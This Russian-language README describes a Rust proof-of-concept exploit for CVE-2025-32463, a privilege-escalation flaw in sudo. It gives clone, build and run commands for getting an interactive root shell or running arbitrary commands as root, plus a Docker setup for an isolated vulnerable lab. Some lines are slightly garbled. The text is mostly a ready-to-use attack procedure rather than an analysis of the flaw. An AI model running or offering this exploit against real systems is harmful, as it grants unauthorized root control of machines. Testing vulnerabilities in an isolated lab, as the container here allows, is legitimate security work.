
Эксплойт на основе Rust, реализующий концепцию (proof-of-concept) для CVE-2025-32463, уязвимости повышения привилегий в Sudo. Запускает интерактивную оболочку root или выполняет произвольные команды с правами root.
git clone https://github.com/krypton-0x00/CVE-2025-32463-Chwoot-POC.git
cd CVE-2025-32463-Chwoot-POC
./exploit
git clone https://github.com/krypton-0x00/CVE-2025-32463-Chwoot-POC.git
cd CVE-2025-32463-Chwoot-POC
cargo build --release
Скомпилированный бинарный файл будет находиться по адресу:
./target/release/CVE-2025-32463-Chwoot-POC
Запустите бинарный файл эксплойта с необязательными аргументами команды:
sudo ./target/release/CVE-2025-32463-Chwoot-POC
id):sudo ./target/release/CVE-2025-32463-Chwoot-POC "id"
В качестве альтернативы можно использовать предоставленный контейнер Docker для изолированной уязвимой среды со всеми установленными зависимостями.
docker build -t sudo-chwoot .
sudo docker images)docker run --rm -it --privileged sudo-chwoot
cd /home/pwn/CVE-2025-32463-Rust-POC
./target/release/CVE-2025-32463-Chwoot-POC